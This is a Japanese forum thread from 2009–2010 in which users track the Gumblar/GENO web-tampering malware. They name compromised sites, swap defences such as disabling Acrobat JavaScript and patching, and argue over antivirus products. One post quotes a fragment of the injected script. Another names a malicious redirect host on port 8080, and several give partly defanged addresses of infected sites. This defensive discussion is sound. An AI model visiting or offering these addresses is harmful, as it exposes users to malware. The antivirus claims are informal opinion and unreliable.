282名無しさん@お腹いっぱい。:2009/12/25(金) 03:39:52
ここで命名しない限りそれは無い
283名無しさん@お腹いっぱい。:2009/12/25(金) 07:17:10
ちゃんと閉鎖・発表してるのに命名されるのは可哀想だ
284名無しさん@お腹いっぱい。:2009/12/25(金) 21:58:27
/*GNU GPL*/や/*CODE1*/などの8080系でAdobe Reader 9.2(最新版)の
脆弱性を突いたPDFファイルが落ちてくるようになった模様

対策は >>1 の「Acrobat JavaScriptをオフ」にすること

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
285名無しさん@お腹いっぱい。:2009/12/26(土) 10:10:59
ついにきたか
さてと、どうすっかなぁ

年末年始休暇の間に職場の全PC設定は勘弁してほしいな

286名無しさん@お腹いっぱい。:2009/12/26(土) 11:28:37
Adobeの次はJava。GENOウイルスの第二波が来るぞー(^o^)ノ
http://tsushima.2ch.net/test/read.cgi/news/1261786925/
287名無しさん@お腹いっぱい。:2009/12/26(土) 11:43:36
http://www.google.co.jp/search?hl=ja&hs=91M&q=%3Cscript%3E%2F*CODE1*%2F+try{window.onload+%3D+function%28%29{var+-co.jp
288名無しさん@お腹いっぱい。:2009/12/26(土) 14:20:56
AdobeReaderの設定ってユーザーごとなのね。めんどくさ。
例 AcrobatJavaScriptの設定
HKCU\Software\Adobe\Acrobat Reader\9.0\JSPrefs
bEnableJS
(HKLMには無い)
ドメイン環境下ならポリシーでばら撒けばいいのか?
289名無しさん@お腹いっぱい。:2009/12/26(土) 14:53:39
>>288
無いなら無いでHKLMにキーを作ってしまえばいいのでは?
Adobe Readerの設定の方からは有効無効を切り替えられなくなるだろうけど。
290名無しさん@お腹いっぱい。:2009/12/26(土) 17:09:20
無駄な情報だったらゴメンこ
現在pixiv一般デイリー3位の人のサイト、踏むとウイルス検知されるみたいなので行かないように
他板のスレでGENOチェッカーで反応したというレスあったので一応念のため
291名無しさん@お腹いっぱい。:2009/12/26(土) 17:13:36
GENOチェッカーとか未だに信じてる奴がいるなんて…
292名無しさん@お腹いっぱい。:2009/12/26(土) 17:21:15
>>291
ああ、ずっとスレ見てなかったからそういうの知らんわスマンね
293名無しさん@お腹いっぱい。:2009/12/26(土) 17:22:16
GENOチェッカーはともかく
/*GNU GPL*/に感染してるな・・・
avast!のWebシールドも反応する
294名無しさん@お腹いっぱい。:2009/12/26(土) 17:49:50
>>289
確かにHKCUからbEnableJSを削除してHKLMに作成した場合は
HKLMを見てくれるようだ。
でもHKCUとHKLMの両方にあって設定が異なる場合は
HKCUのが優先されるからやっぱりだめだ。

www.openspc2.org/reibun/Acrobat9/javascript/app/001/sample/sample.pdf
で動作確認。
295名無しさん@お腹いっぱい。:2009/12/26(土) 20:06:50
Adobe9.2の脆弱性って8や7には関係ないの?
296名無しさん@お腹いっぱい。:2009/12/26(土) 20:11:45
ほれ
ttp://www.jpcert.or.jp/at/2009/at090027.txt
297名無しさん@お腹いっぱい。:2009/12/26(土) 20:59:44
>>297
ありがとう。7は平気なのかな
298名無しさん@お腹いっぱい。:2009/12/26(土) 21:32:50
だめじゃね? 1年以上前にサポート終了してるから特に書いてないだけで。
299名無しさん@お腹いっぱい。:2009/12/26(土) 21:58:12
もしサポート切れてる7使ってたら、その時点で今回の脆弱性云々の問題じゃないだろうねw
300名無しさん@お腹いっぱい。:2009/12/26(土) 23:39:22
>>293
ついこの間、やんちゃにはっちゃけ暴走かましてくれた
avast!って正気に戻ったの?
301名無しさん@お腹いっぱい。:2009/12/27(日) 00:07:47
>>300
いつの話だよ…。大きな誤検知騒ぎは速攻で修正されるわ。
ノートンだろうと何だろうと。
302名無しさん@お腹いっぱい。:2009/12/27(日) 00:44:42
速攻じゃなかったろw
303名無しさん@お腹いっぱい。:2009/12/27(日) 00:50:59
>>301
304名無しさん@お腹いっぱい。:2009/12/27(日) 01:22:50
ホンダのHPがGENOウィルスに感染
http://tsushima.2ch.net/test/read.cgi/news/1261839070/
305名無しさん@お腹いっぱい。:2009/12/27(日) 01:34:15
>>304
うわ〜ついに車関係も。
306名無しさん@お腹いっぱい。:2009/12/27(日) 01:50:01
>>304
↓ここをGoogleのキャッシュで見ると/*GNU GPL*/の記述があるな
ttp://www●honda●co●jp/STREAM/safety/

そろそろ総合スレ立てたほうがいいかね?
307名無しさん@お腹いっぱい。:2009/12/27(日) 01:54:37
GENOじゃねえだろ
308306:2009/12/27(日) 02:12:09
JR東日本と同じで8080系と区別がつかんのだろう
309名無しさん@お腹いっぱい。:2009/12/27(日) 02:17:06
GENOにかかったっぽいのですが
システムの復元でかかる以前の状態に戻せば
クリーンインストールせずに済むのでしょうか?
310名無しさん@お腹いっぱい。:2009/12/27(日) 02:25:54
>>309
このスレはクリーンインストール推奨
できれば安全なPCからパスワードも
変えたほうがいいくらい
自己責任でどうぞ

最近は8080系のほうが流行っているから
本当にGumblarかも分からないし
311名無しさん@お腹いっぱい。:2009/12/27(日) 02:29:44
>>310
そうですか・・・
クリーンインストールをするということはCもDも
プログラムもファイルも全て消えて
PCを買った時の状態に戻るという認識でおkですか?
312名無しさん@お腹いっぱい。:2009/12/27(日) 02:40:50
>>311
メーカー・パソコンのリカバリならそうなるかも
残せるかどうかはマニュアルをよく読むしかない
どちらにしても重要なデータはクリーンインストール前に
USBメモリなどにバックアップしておくのがいい
313名無しさん@お腹いっぱい。:2009/12/27(日) 02:49:02
>>312
明日DVD−ROMでも買って大事なデータをバックアップ後クリーンインストールしてみます。
ありがとうございました。

あ、そのバックアップからまた感染という事態も起こりうるんでしょうか・・・?
314名無しさん@お腹いっぱい。:2009/12/27(日) 02:56:37
>>313
ない、とはいいきれないが、実行ファイルでもない限り大丈夫だと思う
まあ念のため安全な環境から、バックアップデータをウイルススキャンするのもいいかも
315名無しさん@お腹いっぱい。:2009/12/27(日) 03:00:29
>>314
ありがとうございます。
消すのに惜しいプログラムも多少ありますので・・・
明日おっしゃるとおりにやってみます。
316名無しさん@お腹いっぱい。:2009/12/27(日) 03:13:45
Gumblarが戦略的撤退中で8080系が活発に活動。それもゼロデイ突いてくるというおまけ付き

そろそろ総合スレの時期が来たか
スレタイ>>206辺りで良いんじゃないかと個人的には思うけど、GENOって文字含むかどうか難しいなぁ・・・
後テンプレで無駄な論争になるのもなんだかなぁ・・・
317名無しさん@お腹いっぱい。:2009/12/27(日) 03:16:42
8080なんかで検索しねえだろ
そんな名前で呼ぶやつなんて一人くらいだろうし
318名無しさん@お腹いっぱい。:2009/12/27(日) 03:24:42
8080よりむしろGENOのがいらないと思うが
319名無しさん@お腹いっぱい。:2009/12/27(日) 03:28:01
テンプレから無駄な論争に発展しそうな要素を排除すればいいだけだろ。
ブラウザのJavaScript関連なんてテンプレに書く必要ないと思うわ。
320名無しさん@お腹いっぱい。:2009/12/27(日) 03:29:01
ウェブ改竄や脆弱性をついた攻撃であることが分かればいいだろ
8080なんてなんでいるんだよ
それならGENOや/*GNU GPL*/や/*CODE1*/とかのがよっぽどいい
こんなことで争うつもりはないが8080はないよ
321名無しさん@お腹いっぱい。:2009/12/27(日) 03:37:36
スレタイでもうこんな状態かよw
総合スレなんてもうどうにでもな〜れ(AA略
322名無しさん@お腹いっぱい。:2009/12/27(日) 03:50:52
固有名詞ならGumblar(ガンブラー)(系)表記が正しいけど、
GENOウィルスって名称は普通名詞だから、通称表記ならGENOウィルスだね。
323名無しさん@お腹いっぱい。:2009/12/27(日) 03:52:18
タイトルなんて分かれば良いんだけどさ
さすがにGENOは一番有名な呼び名だからいるだろ
324名無しさん@お腹いっぱい。:2009/12/27(日) 03:54:26
だから GENO(系)ウィルススレ でいいんじゃね?
325名無しさん@お腹いっぱい。:2009/12/27(日) 03:55:13
GENOには悪いが
もはやGENOウイルスはウェブ改竄による脆弱性攻撃の総称になりつつあるな
326名無しさん@お腹いっぱい。:2009/12/27(日) 03:58:39
このウィルスってVistaとWin7には無害なんでしょ?
327名無しさん@お腹いっぱい。:2009/12/27(日) 04:06:29
これ感染するとどうなるの?
328名無しさん@お腹いっぱい。:2009/12/27(日) 04:08:37
テンプレは用意してあるがブラウザのJavaScript関連は入れてない
セキュリティ・アップデートのみまとめてある

あとスレタイについては
【8080系ウイルスについて】
という簡単な説明を入れてあるので反対意見もあるが8080は入れたい

>>206 は残念ながら長すぎて入らないので現スレタイ案は
>>203 となっている

とりあえず正式名称と検索でGumblar/GENOは必要と思う
そうすると残りは/*GNU GPL*/と/*CODE1*/だが長くて入らないし
表記が変わるかもしれないので8080の総称を、と思うんだが・・・
329名無しさん@お腹いっぱい。:2009/12/27(日) 04:14:52
>>328
テンプレ用意してあるんなら、このスレとは別に立てればいいじゃん。
このスレのスレタイは今後も GENOウイルススレ だよ。
330名無しさん@お腹いっぱい。:2009/12/27(日) 04:17:05
>>328
次スレ(笑)
http://pc11.2ch.net/test/read.cgi/sec/1245402584/
331名無しさん@お腹いっぱい。:2009/12/27(日) 04:29:46
立てた
追加テンプレ、サンクス

【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/

抜け、間違いがあれば指摘よろ
332名無しさん@お腹いっぱい。:2009/12/27(日) 10:32:04
ノートンだと8080系で侵入防止が働く
333名無しさん@お腹いっぱい。:2009/12/27(日) 14:43:02
>>318
まだ世の中ではGENOという呼称が一般的かと
334名無しさん@お腹いっぱい。:2009/12/27(日) 14:43:43
>>319
それはこまる。ヘボ庶民としては。
335名無しさん@お腹いっぱい。:2009/12/27(日) 14:55:54
>>333
×世の中
○2chの中
336名無しさん@お腹いっぱい。:2009/12/27(日) 15:32:18
>>332
たしかにノートンで侵入防止が働きました。
一安心?
337名無しさん@お腹いっぱい。:2009/12/27(日) 18:05:46
ふと思ったけど、
これって、8080の外行きをブロックしちゃえばOKか?

意外に対策しやすいオチ?
338名無しさん@お腹いっぱい。:2009/12/27(日) 18:26:17
みんながブロックしたら80にするだけだと思うんだ
8080はたぶん串
339名無しさん@お腹いっぱい。:2009/12/27(日) 18:48:02
だから8080なんて呼ぶなよ
頭悪いだろ
340名無しさん@お腹いっぱい。:2009/12/27(日) 18:50:53
GENOのが頭悪い
341名無しさん@お腹いっぱい。:2009/12/27(日) 18:52:04
頭悪いは良いぎだが
そう呼ぶ理由がない
342名無しさん@お腹いっぱい。:2009/12/27(日) 18:56:15
実質そう読んでるのは一人だろ
なぜか普及させようとしてるようだが
343名無しさん@お腹いっぱい。:2009/12/27(日) 19:36:06
ポート8080を使う改竄は、海外メインで他にもあるらしいからなあ…
って、これ以上は総合スレ出来た以上スレチか
344名無しさん@お腹いっぱい。:2009/12/27(日) 19:41:51
>>322
345名無しさん@お腹いっぱい。:2009/12/28(月) 00:18:27
GENOに感染してると100%わかるサイトチェッカーってある?
346名無しさん@お腹いっぱい。:2009/12/28(月) 00:25:49
むしろ感染してたら迷惑なので、さっさとネットから切断して欲しいんだが
347名無しさん@お腹いっぱい。:2009/12/28(月) 00:26:21
GIGAZINEが感染してる
注意せよ
348名無しさん@お腹いっぱい。:2009/12/28(月) 00:27:05
注意喚起あげ
349名無しさん@お腹いっぱい。:2009/12/28(月) 00:44:27
今見たけど見当たらないような
350名無しさん@お腹いっぱい。:2009/12/28(月) 00:46:20
Nortonセーフウェブでもgredでも異常なしだった。
どこが感染してるの?
351名無しさん@お腹いっぱい。:2009/12/28(月) 00:46:58
GIGAZINEはAvastの誤検知のやつじゃねえの?
ちゃんと確認したのかよ
352名無しさん@お腹いっぱい。:2009/12/28(月) 00:54:34
>>347
PCニュースにスレ立てるとかGIGAZINEにメールとかはしたの?
353名無しさん@お腹いっぱい。:2009/12/28(月) 00:55:52
GIGAZINEは無罪
またavastが、やらかした
http://pc11.2ch.net/test/read.cgi/sec/1260287998/897n-
354名無しさん@お腹いっぱい。:2009/12/28(月) 00:58:28
ソース見たけどって・・またavastか
355名無しさん@お腹いっぱい。:2009/12/28(月) 00:59:26
誤検出かどうかも確認しないで条件反射で騒ぎ立てる奴は消えろよ
アホか
356名無しさん@お腹いっぱい。:2009/12/28(月) 01:01:55
すまん… orz By avast
357名無しさん@お腹いっぱい。:2009/12/28(月) 01:26:44
HTMLわからんのに感染てるって言い切るところがかっこいい
358名無しさん@お腹いっぱい。:2009/12/28(月) 01:27:29
しがぬけたけどどうてもよかった
359名無しさん@お腹いっぱい。:2009/12/28(月) 01:34:21
こんな短期間にまたも語検出暴発再発とは…。
さすがにこれでもうavast使うやつはいなくなるだろ。
これでまだ使うのはマゾか頭がイカれてるかどちらかだ。
360名無しさん@お腹いっぱい。:2009/12/28(月) 02:51:41
スルーされて感染するよりか誤検出のほうがマシという考えもあるからね
avast使い慣れてるし便利な機能もあるからサポートが切れるまでは乗り換えは眼中にないかな
361名無しさん@お腹いっぱい。:2009/12/28(月) 03:01:08
ユニメル騒動に釣られたデジタルマガジン 今度はGENOウイルスに感染か?
http://tsushima.2ch.net/test/read.cgi/news/1261936729/
362名無しさん@お腹いっぱい。:2009/12/28(月) 04:47:55
■カスペルスキー
初期設定が明らかにまずいから変更推奨。
GENOに特化しているがそれ以外は微妙。
癖があってアプリやwinupdate時に誤作動起こしたり勝手に削除される事あり。

■マカフィー
御三家では地味な印象。
シンプルでそこそこ軽い部類だけど対応が甘く信頼しきれない。

■ウィルスバスター
ガチ重い。
無駄にリソース喰いで受けていないテストも多く検出能力は眉唾、過去に盛大なやらかし有。

■ノートン
初期設定がまずいから要設定。常駐時は軽いがスキャンは遅い。
定義更新でたまにやらかしたりFIREFOX3.5xとの相性が微妙。
2010実装のSONAR2はGENO亜種などの未知のウィルスに対応しているが設定変えないと
強力な誤爆(=デフォルトだと強制削除)をくらう可能性ありで注意。
多機能でアドオンとインサイトなどの連携機能は優秀。
OSは安定性考えるならVista以降を推奨。

■ESET
軽くて割とシンプル(機能面でちょっと物足りないかも)。
検出能力は普通か。過去に一度だけ盛大なやらかし有。


誰でも知ってる市販の有名どころを出してみたが、ぶっちゃけ、どこも一長一短ですな。
363名無しさん@お腹いっぱい。:2009/12/28(月) 05:00:28
いきなりどうした?
364名無しさん@お腹いっぱい。:2009/12/28(月) 05:34:34
男ならアンチウィルスもFWも必要ない!
常時ノーガードだ
365名無しさん@お腹いっぱい。:2009/12/28(月) 09:29:54
esetなんて有名でもなんでもないが…またアレな人かw
366名無しさん@お腹いっぱい。:2009/12/28(月) 13:47:24
この手のウイルス感染って
やっぱりみんな管理者権限で普段から使ってるってこと?
367名無しさん@お腹いっぱい。:2009/12/28(月) 15:25:17
だってじゃないと不便だし・・・

っていう層が大半だからだろ
368名無しさん@お腹いっぱい。:2009/12/28(月) 16:10:17
DropMyRightsってソフトいいね
マイクロソフト製だし(未サポートソフトだけど)
普段管理者権限で使ってるけどWEBアプリとかこれ通して起動したら
そのアプリはユーザー権限に下げられる
GENO対策にいいんじゃない?
369名無しさん@お腹いっぱい。:2009/12/28(月) 16:16:08
そんなの使うやつなら
もともとGENOなど感染しない
370名無しさん@お腹いっぱい。:2009/12/28(月) 16:17:39
Vistaユーザになる
371名無しさん@お腹いっぱい。:2009/12/28(月) 16:35:57
GENOじゃないけど
最近のパスワード流出はソフトの設定読み取るのもあるみたいだから
権限関係なかったりする
372名無しさん@お腹いっぱい。:2009/12/28(月) 16:39:41
そもそもユーザー権限とか基本的には関係ないし。
単にアップデートを怠っている馬鹿が引っかかるだけだろ。
373名無しさん@お腹いっぱい。:2009/12/28(月) 16:53:32
ユーザー権限関係ないっておかしくね?
感染PCシステムファイル変更されてるみたいだけど
ユーザー権限でシステムに変更加えられるの?
374名無しさん@お腹いっぱい。:2009/12/28(月) 17:05:43
>>362
GDATAが入ってないとな!?
375名無しさん@お腹いっぱい。:2009/12/28(月) 17:14:17
>>373
だから「基本的には」だろ。
やるべきことさえきっちりやっておけばシステムファイルの変更なんてされないんだから。
376名無しさん@お腹いっぱい。:2009/12/28(月) 17:24:26
これ感染したらどうなるの?
377名無しさん@お腹いっぱい。:2009/12/28(月) 17:44:32
信越放送HP 不正アクセスされ改ざん 閲覧した人はウイルスに感染した可能性
http://tsushima.2ch.net/test/read.cgi/news/1261989823/
378名無しさん@お腹いっぱい。:2009/12/28(月) 21:20:47
>>287
実害はこれの10倍以上はあるだろうな
379名無しさん@お腹いっぱい。:2009/12/31(木) 14:18:06
 
380名無しさん@お腹いっぱい。:2010/01/01(金) 02:32:55
ん?
381某社シス管:2010/01/01(金) 15:49:14
さて、年明け早々、Web改竄ウイルス対策を上に説明しないといけない。
うちは、被害が確認されていないけど。
これから、資料作るべか。
親会社のシステムの関係でAdobeのJavaScript切れないし、
ReaderもflashもJREも自動更新きってあるし、配布ツールないし、700台あるし、どないするべかな。
親会社からのウイルス対策案内は、「なめてんのか?」のかという内容だし(無許可のUSBメモリなど使うなとか勝手にソフト入れるなとか)だし。
はぁ〜・・orz
382名無しさん@お腹いっぱい。:2010/01/02(土) 05:59:01
700台のハニーポットか…
383名無しさん@お腹いっぱい。:2010/01/04(月) 03:35:07
tp://www●naito-akira●com/
新型っぽい。
384名無しさん@お腹いっぱい。:2010/01/04(月) 07:21:21
>>383
GNU GPLの8080。新型というほどでは…。飛び先は
salesforce-com.tinypic.com.gameztar-com.guidebat■ru:8080/rambler.ru/rambler.ru/corriere.it/adsrevenue.net/google.com/
385名無しさん@お腹いっぱい。:2010/01/04(月) 23:03:29
//www●morozoff●co.jp/

ニュー速で何やら話題になっていたようだがこれは?
386名無しさん@お腹いっぱい。:2010/01/04(月) 23:04:52
GNU GPLの8080。
387名無しさん@お腹いっぱい。:2010/01/04(月) 23:13:22
モロゾフの公式サイトでトロイ配布中
http://tsushima.2ch.net/test/read.cgi/news/1262611814/l50
388名無しさん@お腹いっぱい。:2010/01/04(月) 23:26:39
モロゾフ、アウト〜
389名無しさん@お腹いっぱい。:2010/01/05(火) 00:29:25
504 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:05:24.72 ID:9xzGeSng
感染してるやつ

プロセス見てみろ変なのが('A`)


516 名前: カッターナイフ(鹿児島県)[sage] 投稿日:2010/01/05(火) 00:08:10.60 ID:JBW7jlI0
>>504
~TM108.tmp
こんな感じのやつ?

524 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:10:12.00 ID:E7kbsyQA
>>516
そう

>>517
ログインしているユーザー名
systemにはいない

535 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:12:24.54 ID:E7kbsyQA
うわあああああああああああああああああああああ
早速TELNETでユーザ名的確に打って総当たり攻撃キタ━━━━(°Д°)━━━━!!!!

ファイル抜かれるからIP変更するさらばあああああ
390名無しさん@お腹いっぱい。:2010/01/05(火) 00:48:03
楽しそうだなw
391名無しさん@お腹いっぱい。:2010/01/05(火) 17:07:20
Gumblarが読売の夕刊のトップ記事になってるね
カタカナでガンブラーって凄い違和感があるけどw
392名無しさん@お腹いっぱい。:2010/01/05(火) 17:16:10
釣りだろ
393名無しさん@お腹いっぱい。:2010/01/05(火) 17:21:14
GENO(Gumblar)ウイルススレ ★24
394名無しさん@お腹いっぱい。:2010/01/05(火) 18:24:43
ガンプラー
395名無しさん@お腹いっぱい。:2010/01/05(火) 20:33:59
グーグルの急上昇ワードにガンブラーがw
396名無しさん@お腹いっぱい。:2010/01/05(火) 20:44:44
癌ブラーは転移していくぞ
397名無しさん@お腹いっぱい。:2010/01/05(火) 22:25:29
p://knnn4321●chips●jp/hpblog/p-18044●html

かなりヤバい
398名無しさん@お腹いっぱい。:2010/01/05(火) 22:32:33
avastたん入れるしかないのか
399名無しさん@お腹いっぱい。:2010/01/05(火) 22:41:11
>>397
新種か?
400名無しさん@お腹いっぱい。:2010/01/05(火) 23:27:03
>>397
なにもないぞ
401名無しさん@お腹いっぱい。:2010/01/05(火) 23:31:24
うん?
402名無しさん@お腹いっぱい。:2010/01/05(火) 23:41:53
prototype.jsに仕込み
403名無しさん@お腹いっぱい。:2010/01/05(火) 23:48:47
辻ちゃんのサイトがトロイに感染
http://tsushima.2ch.net/test/read.cgi/news/1262698533/
404名無しさん@お腹いっぱい。:2010/01/06(水) 01:01:51
辻ちゃん、アウト〜
405名無しさん@お腹いっぱい。:2010/01/06(水) 01:32:24
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
406名無しさん@お腹いっぱい。:2010/01/06(水) 01:55:54
p://www●biwako●ne●jp/~kohsoku/home●html
407名無しさん@お腹いっぱい。:2010/01/06(水) 04:10:27
ReaderとFlashはともかく、JREとQuick Timeは余程の事がない限り
入れない方が賢い
408名無しさん@お腹いっぱい。:2010/01/06(水) 04:29:09
株や為替のチャートってJava使ってる業者が多いから使わざる得ない人も多いはず
409名無しさん@お腹いっぱい。:2010/01/06(水) 04:54:08
入れててもチェック外して使わないようにしてればいいがね
410名無しさん@お腹いっぱい。:2010/01/06(水) 05:09:09
JREはシステムに喰いこみ過ぎでうざい
411名無しさん@お腹いっぱい。:2010/01/06(水) 06:52:22
>>408
お絵描き掲示板がほぼJavaなので同人では多いかもね
412名無しさん@お腹いっぱい。:2010/01/06(水) 10:21:18
zing-vn.google〜
のアドレスの中身(IP)がフランスに飛んだりドイツに飛んだりしてる?
413名無しさん@お腹いっぱい。:2010/01/06(水) 10:52:09
今日の朝日新聞朝刊1面にガンブラーが載ってた。対策はウイルス対策ソフトを最新にすることだってさ。
abobe readerのことまで書けばいいのにね
414名無しさん@お腹いっぱい。:2010/01/06(水) 10:53:32
>>413 ttp://www.asahi.com/national/update/0105/TKY201001050398.html
415名無しさん@お腹いっぱい。:2010/01/06(水) 11:06:36
>>404
嘘の情報を流して楽しいの?
416名無しさん@お腹いっぱい。:2010/01/06(水) 12:02:23
>>30
コピー〜貼り付けでこれ使ってしまった俺は負け組か?
417名無しさん@お腹いっぱい。:2010/01/06(水) 12:04:43
>>407
QuickTimeはどうしても必要な場合のみ一旦落としてから他のフォーマットに変換して見てるから特に困らない
JREはサブ機のみに入れて利用してる
418名無しさん@お腹いっぱい。:2010/01/06(水) 12:10:10
>>416
まあドンマイ
419名無しさん@お腹いっぱい。:2010/01/06(水) 12:22:34
UACてなに〜?
教えてエロい人
420名無しさん@お腹いっぱい。:2010/01/06(水) 12:28:42
>>414

>被害は計5社、改ざんされたサイトの閲覧者は延べ7万人を超す。
>(中略)
>ホンダはミニバン「ストリーム」のサイトが昨年12月18〜21日に改ざんされ、約5千人が閲覧した。
>JR東日本のHPは同月8〜22日に不正アクセスが繰り返され、プログラムが書き換えられた。
>23日に約17時間にわたって閉鎖して復旧したが、それまでの閲覧者は約5万人。
>
>信越放送のHPも同月26〜28日に改ざんされ、約5400人が閲覧した。
>ラジオ関西では同月15〜16日に特集サイトの「アニたまどっとコム」が改ざん、約6千人が閲覧した。
>洋菓子のモロゾフのHPは今月4〜5日に改ざん。「ガンブラーかどうかは調査中」とするが、この間に約3860人が閲覧した。
421名無しさん@お腹いっぱい。:2010/01/06(水) 12:33:44
>>412
fast-fluxなんでね? 手駒に使える陥落サイトが腐るほどあるし。
そことは別の8080にdigしまくってみたけど1秒経たずにIP変わる。
422名無しさん@お腹いっぱい。:2010/01/06(水) 12:36:16
ユーザーアカウント制御のことだお。
それぐらいググレ厨房
423名無しさん@お腹いっぱい。:2010/01/06(水) 12:44:15
>>416
悔しかったら通報してみなさい!
424名無しさん@お腹いっぱい。:2010/01/06(水) 14:04:47
>>419
http://www.tkssoft.com/cmd/cmd026.html
425名無しさん@お腹いっぱい。:2010/01/06(水) 14:07:27
モロゾフをgoogleで検索したら、AVGツールバーは安全ですって緑のマークが検索結果横に付いているんだけど、もうこのサイトの脅威は去ったの?
それともまだ訪問したらgumblarに感染するのかな?
426名無しさん@お腹いっぱい。:2010/01/06(水) 14:18:57
>>425
モロゾフは修正されてるね
427名無しさん@お腹いっぱい。:2010/01/06(水) 14:21:56
>>381
つ Systems Management Server

428名無しさん@お腹いっぱい。:2010/01/06(水) 14:33:28
>>423
「30に引っかかって、パソコンのエロ動画が全部消えてしまいまいた」
って通報しますた。
429名無しさん@お腹いっぱい。:2010/01/06(水) 14:40:05
wwwwwwww
430名無しさん@お腹いっぱい。:2010/01/06(水) 14:44:52
>>425
検索エンジンで未だに改ざんコードが埋まってるページを検索しても安全扱いされてそうな気がするんだけど、
そこら辺はどうなってる?
431名無しさん@お腹いっぱい。:2010/01/06(水) 15:17:16
>>430
そこが自分も知りたいのですよ
今脅威のあるサイト名が分からないので試せないのですが、このツールバーがいったいどの程度の精度と安心・信頼感があるのかを試したくて
もし今脅威のサイトを検索して黄色とかになっていたら信用できるから自分は引っかかる可能性は低いと安心できるのですが・・・
432名無しさん@お腹いっぱい。:2010/01/06(水) 15:32:55
そもそもAVGはモロゾフのやつ防げるのか?
スクリプトも何もかも検出してるところは見たこと無いが
433名無しさん@お腹いっぱい。:2010/01/06(水) 15:43:48
>>431
Bingで「"*/ try{window.onload"」で検索してみて
※リンク先には改ざんコードが埋まってるのでアクセスは絶対にしないように

多分改ざんには対応してない気がするんだけどな
434名無しさん@お腹いっぱい。:2010/01/06(水) 15:46:30
動的サイトを作らなければOK
435名無しさん@お腹いっぱい。:2010/01/06(水) 16:00:37
>>430
www.hikky-country.net
ここのサイトは埋め込まれたまま1ヶ月くらい放置してたけど、google検索で安全の緑マークのままだった。
検索エンジンは、リアルタイムで、内容を反映するわけではないし、安全マークを「今現在」の判断の根拠にするのは無理があるのでは?
436名無しさん@お腹いっぱい。:2010/01/06(水) 16:24:15
>>435
AVGツールバーの仕組みを理解してるか?
437名無しさん@お腹いっぱい。:2010/01/06(水) 16:39:58
だからすくりぷと防げるとかにやっきになってないで
ソフト更新しとけばオワリ
してる?じゃあきにすんなオワリ
438名無しさん@お腹いっぱい。:2010/01/06(水) 17:17:12
フジテレビキタ━━━━━━(゚∀゚)━━━━━━!!!!
439名無しさん@お腹いっぱい。:2010/01/06(水) 17:40:25
GENOウイルス感染 ローソン
http://tsushima.2ch.net/test/read.cgi/news/1262766483/
440名無しさん@お腹いっぱい。:2010/01/06(水) 17:43:46
>>435
今はどうなん?
対処したの?
俺のgoogle検索結果でもAVGは緑マークだけど

ってか、寧ろ逆にこのAVGが黄色とか注意してる検索結果サイトを知りたい
441名無しさん@お腹いっぱい。:2010/01/06(水) 17:47:32
>>439
マジか?
ローソンもう対処うったのか分からんけれど例のAVGは緑チェック入ってるね

ってか、このウィルスっていったいどうやって各サイトに侵入してスクリプト埋め込んでるの?
俺Webサイト作るんだけど、対策どうすればいいのか分からないんだけど・・・
サーバサイド側のどこをどうしたらいいのかとか
442名無しさん@お腹いっぱい。:2010/01/06(水) 17:49:08
馬鹿すぎプレイか1から読めよ
443名無しさん@お腹いっぱい。:2010/01/06(水) 17:49:31
HTMLとCSSだけ使っとけばいいよ^^
444名無しさん@お腹いっぱい。:2010/01/06(水) 18:07:21
>>30
最低だな、お前!
氏ねよ!

>>416
のようにやってしまった人間はアクセサリの復元しても駄目なん?
445名無しさん@お腹いっぱい。:2010/01/06(水) 18:24:21
さっきTVでも、ローソンに「狙われる覚えは?」なんてアホな質問してたし
世間的にはこのウイルスもそういう認識が大方なんだろうなあ
446名無しさん@お腹いっぱい。:2010/01/06(水) 18:55:35
p://hirayuonsen●or●jp/

ここも反応する。。
447名無しさん@お腹いっぱい。:2010/01/06(水) 19:07:16
>446
森のほうはどう?
448名無しさん@お腹いっぱい。:2010/01/06(水) 19:10:11
アンチウイルスソフトはどれがいいんだよ。
どのスレも荒れてて訳わからんわ。
449名無しさん@お腹いっぱい。:2010/01/06(水) 19:13:05
カスペかアバスト
450名無しさん@お腹いっぱい。:2010/01/06(水) 19:13:17
>>448
「Norton 360 Ver.3 2コニコPACK」がいいよ。
451名無しさん@お腹いっぱい。:2010/01/06(水) 19:16:58
バスターしかないだろ
452名無しさん@お腹いっぱい。:2010/01/06(水) 19:20:45
>>448
有料ならKaspersky
http://www.kaspersky.co.jp/trials?blocknum2=1

無料ならavast!
http://files.avast.com/iavs4pro/setupjpnpro.exe
http://www.btfree.info/html/0339d429a878a5d.html
453名無しさん@お腹いっぱい。:2010/01/06(水) 19:42:07
>>444
ムリだよ
こういう屑虫は逮捕された方が世の為だが、
税金で生かすにも勿体ないので死んで欲しいよね
454名無しさん@お腹いっぱい。:2010/01/06(水) 19:42:52
>>439はギコナビで見ても大丈夫?
見ようとしたらウイルスソフトが「だめーーー!」って言って見れなかったんだが…
455名無しさん@お腹いっぱい。:2010/01/06(水) 19:44:02
Norton360は余計な糞機能が付きまくってるから論外
通常のNIS2010はOK
バスターは無駄に重いがPCのスペックに余裕がある人は可
456名無しさん@お腹いっぱい。:2010/01/06(水) 19:44:28
GENO専なら重いカスペか
うちは3939NODだけどw
バスターはありえない
457名無しさん@お腹いっぱい。:2010/01/06(水) 19:45:24
カスペは誤爆ひどいぞ
GENO以外じゃ使えたもんじゃない
